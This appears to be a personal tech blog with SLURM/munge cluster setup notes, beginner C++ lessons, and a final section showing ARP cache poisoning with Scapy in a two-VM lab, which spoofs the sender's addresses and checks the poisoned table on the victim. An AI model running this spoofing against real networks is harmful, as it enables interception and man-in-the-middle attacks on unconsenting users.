Setup SLURM scheduler

For SLURM documentation, please go here:  https://slurm.schedmd.com/
Simply put, SLURM is a job scheduler system that allows users to allocate compute resources for computational jobs.

The following are my old notes from when I migrated from Maui + Torque to SLURM on my HomeWood HPC cluster.
In this example, I use two hosts to illustrate installing and configuring a basic SLURM setup:

    Distro: CentOS 6
    Management host: mgmt
    compute host:  compute001

#Perform on both mgmt + compute001:

yum update
yum install wget gcc gcc-c++ make kernel-devel kernel-headers perl rpm-build -y
yum -y install epel-release

#Verify both munge users are the same on both mgmt + compute001
#Or remove user “munge” and re-create a new munge
#Add slurm user with exact uid + gid on both mgmt + nodes:

groupadd -g 497 slurm
useradd -m -c "SLURM ID" -d /var/lib/slurm -u 497 -g slurm -s /bin/bash slurm

#Download blcr:
wget http://crd.lbl.gov/assets/Uploads/FTG/Projects/CheckpointRestart/downloads/blcr-0.8.5.tar.gz

#Build the RPM:
rpmbuild -tb --define 'with_multilib 0' blcr-0.8.5.tar.gz

#Install the packages:
cd /root/rpmbuild/RPMS/x86_64/
yum install blcr* --nogpgcheck -y

#Install Munge:
yum install munge munge-libs munge-devel -y

 
#Only on mgmt:
dd if=/dev/urandom bs=1 count=1024 > /etc/munge/munge.key
chown -R munge: /var/log/munge

 
#On mgmt:
#Copy munge.key to every compute node (here compute001:/etc/munge/munge.key)
scp /etc/munge/munge.key compute001:/etc/munge/

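#Fix ownership and permissions on compute001
#(the directories need 0700 so munged can still enter them; only the key is 0400):
chown -R munge: /etc/munge/ /var/log/munge/
chmod 0700 /etc/munge/ /var/log/munge/
chmod 0400 /etc/munge/munge.key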

 
#Start munge:
service munge start
#Or run the daemon directly, overriding its startup warnings:
/usr/sbin/munged --force

 
#Verify Munge is working:
munge -n
munge -n | unmunge
munge -n | ssh compute001 unmunge
remunge

 

#Back to setting up SLURM
#Dependencies both mgmt + compute001:

yum install openssl openssl-devel pam-devel numactl numactl-devel hwloc hwloc-devel lua lua-devel readline-devel rrdtool rrdtool-devel ncurses-devel man2html libibmad libibumad mysql-devel perl-ExtUtils-MakeMaker freeipmi gtk2-devel redhat-lsb redhat-rpm-config -y

 

#Turn off SELinux
#Enable port 6817,6818,7321 udp + tcp
for portnumber in 6817 6818 7321; do iptables -A INPUT -m state --state NEW -p tcp --dport $portnumber -j ACCEPT; done
for portnumber in 6817 6818 7321; do iptables -A INPUT -m state --state NEW -p udp --dport $portnumber -j ACCEPT; done

#Sync clock on all nodes and mgmt:
yum install ntp -y
chkconfig ntpd on
ntpdate pool.ntp.org
/etc/init.d/ntpd start

#Only on mgmt:
#Download latest slurm: http://www.schedmd.com/#repos
wget http://www.schedmd.com/download/latest/slurm-16.05.2.tar.bz2
rpmbuild -ta slurm-16.05.2.tar.bz2

#Now copy all of the slurm*.rpm files to mgmt and every compute node, then install them:
scp slurm* all_nodes:/tmp/
yum --nogpgcheck localinstall slurm*

On mgmt: create slurm.conf with the configurator at http://slurm.schedmd.com/configurator.easy.html

Or start from the example file:

cp /etc/slurm/slurm.conf.example /etc/slurm/slurm.conf
#then substitute your system info

#Once slurm.conf is configured, copy it to /etc/slurm/ on all compute nodes:
scp /etc/slurm/slurm.conf compute00x:/etc/slurm/

 
#On mgmt only:
mkdir /var/spool/slurmctld
mkdir /var/spool/slurmd
chown slurm: /var/spool/slurmctld
chown slurm: /var/spool/slurmd
chmod 755 /var/spool/slurmctld
chmod 755 /var/spool/slurmd
touch /var/log/slurmctld.log
chown slurm: /var/log/slurmctld.log
touch /var/log/slurm_jobacct.log /var/log/slurm_jobcomp.log
chown slurm: /var/log/slurm_jobacct.log /var/log/slurm_jobcomp.log

 
#On the compute001:
mkdir /var/spool/slurmd
chown slurm: /var/spool/slurmd
chmod 755 /var/spool/slurmd
touch /var/log/slurmd.log
chown slurm: /var/log/slurmd.log
 

#Verify it:
slurmd -C

#On both mgmt + compute001:
chkconfig slurm on
/etc/init.d/slurm start

 
#If a node is marked down or drained, put it back in service (one node, or a range):
scontrol update nodename=compute001 state=resume
scontrol update nodename=compute[001-100] state=resume

 
#Possible error:
slurm_receive_msg: Protocol authentication error
[2016-08-03T15:13:19.650] error: slurm_receive_msg [172.20.1.1:49082]: Protocol authentication error
[2016-08-03T15:13:19.650] error: invalid type trying to be freed 65534
[2016-08-03T15:13:20.663] error: Munge decode failed: Expired credential

#Solution: make sure the clocks on the server and the nodes are in sync
#Sync time between server and node:
yum install ntp
ntpdate server_name
service ntpd start
chkconfig ntpd on

#Other error:
#Slurm will not start

#Solution: make sure the log files and the /var/spool/slurmd path set in /etc/slurm/slurm.conf exist with the proper ownership and permissions on both the server and the compute node

 
#Verify:
#Display compute nodes:
scontrol show nodes

 
#Run job on server:
srun -N1 /bin/hostname

 
#Display job queue:
scontrol show jobs

 
#Submit script jobs:
sbatch -N1 script-file

Hope you enjoy it!

C++ Switch

A switch statement is very similar to an if / else if / else chain: it compares one value against a list of constant cases.

Syntax:

switch (x) {
case 1:
    //do something
    break;
case 2:
    //do something
    break;
}

 

 

Compare the Switch and if-else

Using if-else if-else:

int x = 2;

if (x == 1) {
    //do something…
}
else if (x == 2) {
    //do something…
}
else {
    //do something…
}

 

Using Switch:

int x = 2;

switch (x) {
case 1:         //==== if (x == 1)
    //do something
    break;      //done, exit the switch
case 2:         //==== else if (x == 2)
    //do something
    break;
case 3:         //==== else if (x == 3); no break, so it falls through to default
default:        //==== else { //do something }
    //do something
}
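
In the switch above, case 3 has no body and no break, so execution falls through into default. Here is a minimal sketch of that behaviour. The helper name describe() and the labels it returns are made up for illustration; they are not part of the original notes.

```cpp
#include <string>

// Hypothetical helper (not from the original notes): returns a label
// for x so the result can be checked without reading console output.
std::string describe(int x) {
    std::string result;
    switch (x) {
    case 1:
        result = "one";
        break;              // leave the switch
    case 2:
        result = "two";
        break;
    case 3:                 // no body and no break: falls through to default
    default:
        result = "other";
    }
    return result;
}
```

With this sketch, describe(3) and describe(42) both land in the default branch, while describe(1) and describe(2) stop at their own break.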

C++ Function

A function is a group of statements that together perform a task. It is most useful for a task you need to repeat.

Here is a repeated task:

int a = 2, b = 3;
int c = a + b;

a = 1; b = 9;
c = a + b;

a = 20; b = 5;
c = a - b;

a = 100; b = 10;
c = a / b;

 

Using a function, you write the code once and reuse it:

#include <iostream>
using namespace std;

//Set up a function:
void func_math(int a, int b) {
    int c = a + b;
    int z = a / b;      //integer division: the fraction is dropped
    int y = a - b;
    cout << c << endl;
    cout << z << endl;
    cout << y << endl;
}                       //End of function

int main()
{
    func_math(2, 3);            //prints 5, 0, -1
    func_math(10, 20);          //prints 30, 0, -10
    func_math(19949, 948595);
    func_math(39474, 234);
}

 

Multiplication and Addition:

#include <iostream>
using namespace std;

void math(int a, int b) {
    int z = a * b;
    int x = a + b;
    int y = a - b;
    int i = a / b;      //integer division: the fraction is dropped

    cout << "Multiplication of a and b = " << z << endl;
    cout << "Sum of a and b = " << x << "\n" << endl;
    cout << "Subtraction of a and b = " << y << endl;
    cout << "Division of a and b = " << i << endl;
}

int main()
{
    cout << "First:" << endl;
    math(10, 20);

    cout << "Second:" << endl;
    math(5, 10);

    cout << "Third:" << endl;
    math(40, 20);
    return 0;
}
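
One thing to watch in math(): a and b are both int, so a/b is integer division and math(10,20) computes 0 for the division, not 0.5. The sketch below contrasts the two kinds of division. The helper names int_divide() and real_divide() are hypothetical and not part of the original notes, and both assume b is not zero.

```cpp
// Hypothetical helpers (not from the original notes). Both assume b != 0.

// Integer division: the fractional part is discarded.
int int_divide(int a, int b) {
    return a / b;
}

// Converting one operand to double first makes the division floating-point.
double real_divide(int a, int b) {
    return static_cast<double>(a) / b;
}
```

For the inputs used in main() above, int_divide(10, 20) gives 0 while real_divide(10, 20) gives 0.5; for 40 and 20 both give 2.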

————

Example2:

#include <iostream>
#include <string>
using namespace std;

//thanhpho = city
void person(string name, int age, string thanhpho) {
    cout << "My name is " << name
         << " and I am " << age << " years old.\n"
         << "I am from: " << thanhpho << endl;
}

int main() {
    person("Sky", 100, "LatLoi");
    person("Sonny", 50, "Son");
    person("Cloud", 69, "Khodan");
    return 0;
}

C++ intro

#include <iostream>
using namespace std;

int main()
{
    cout << "Hello C++.\n";             // the \n means newline.
    cout << "Hello C++." << endl;

    int a, b;
    int c;

    a = 1;
    b = 2;
    c = a + b;
    cout << "total of a + b = " << c << "\n";

    //another example:
    int x = 30, y = 50;
    int z = y - x;
    cout << "difference of y and x = " << z << "\n";

    //another example:
    int i(100);

    //Variable total:
    int total = a + b + x + y + i;

    //Get the total:
    cout << "Total of all variables: " << total << "\n";
    return 0;
}

————————-

String variable

#include <iostream>
#include <string>
using namespace std;

int main()
{
    string username;

    cout << "What is your name? " << endl;
    cin >> username;
    cout << "You said your name is: " << username << endl;
}
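
Note that cin >> username stops at the first space, so typing a first and last name would only store the first word. A minimal sketch of reading the whole line with std::getline follows. The helper name read_full_name() is hypothetical and not part of the original notes; it takes any input stream so it can be tried without a keyboard.

```cpp
#include <iostream>
#include <sstream>
#include <string>

// Hypothetical helper (not from the original notes): reads one whole
// line, spaces included, from the given input stream.
std::string read_full_name(std::istream& in) {
    std::string name;
    std::getline(in, name);
    return name;
}
```

In the program above you would call it as read_full_name(cin) in place of cin >> username.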

—————————–

Condition: if, else if, else

#include <iostream>
#include <string>
using namespace std;

int main()
{
    int totalyear;
    string mycity;

    cout << "Where are you from? " << endl;
    cin >> mycity;

    cout << "How long have you lived there? " << endl;
    cin >> totalyear;

    if (totalyear > 10) {
        cout << "You have lived in " << mycity << " for " << totalyear << " years." << endl;
    }
    else if (totalyear < 10) {
        cout << "You did not live in " << mycity << " that long." << endl;
    }
    else {
        cout << "Exactly " << totalyear << " years." << endl;
    }
}
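
Because the first two tests are > 10 and < 10, the final else only runs when totalyear is exactly 10. The sketch below isolates that branching so each path can be checked. The helper name classify_years() and its return strings are hypothetical and not part of the original notes.

```cpp
#include <string>

// Hypothetical helper (not from the original notes) mirroring the
// three branches of the program above.
std::string classify_years(int totalyear) {
    if (totalyear > 10) {
        return "more than 10";
    }
    else if (totalyear < 10) {
        return "less than 10";
    }
    else {
        return "exactly 10";    // only reached when totalyear == 10
    }
}
```

Trying 11, 9 and 10 exercises the if, the else if and the else branch in turn.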

 

 

 

 

Scapy ARP poisoning

Using Python scapy, I am going to try an ARP poisoning.

For clarification, I will use two VMs: VM01 and VM02.

VM01 = my main server

VM02 = my target

 

On VM01, Run scapy, then:

pkt=ARP()

pkt.show()    #this will output something similar to:

[ ARP ]
hwtype= 0x1
ptype= IPv4
hwlen= 6
plen= 4
op= who-has
hwsrc= ##:##:##:##:##:##
psrc= #.#.#.#
hwdst= 00:00:00:00:00:00
pdst= 0.0.0.0

There are a few significant parameters that need changing or filling in.

1. hwsrc = hardware address of the source, i.e. my Ethernet/MAC address.  Change it to anything:

pkt.hwsrc="01:01:01:01:01:01"

2. psrc = IP address of the source, i.e. my IP.  Again, I don’t want to broadcast my IP, so change it:

pkt.psrc="192.168.1.254"

3. hwdst = Fill in the hardware (MAC) address of your target.

4. pdst = Fill in the IP of your target.

Then verify it:

pkt.show()           #Output should have all the above info

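Finally, we launch the attack.  ARP lives at OSI layer 2, but scapy’s send command works at layer 3 and builds the Ethernet frame for us (sendp is the layer 2 variant and expects an explicit Ether() header):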

send(pkt)

 

On VM02 (my victim server), run the command:

arp

The fake MAC and IP mapping sent from VM01 will show up in VM02’s ARP table.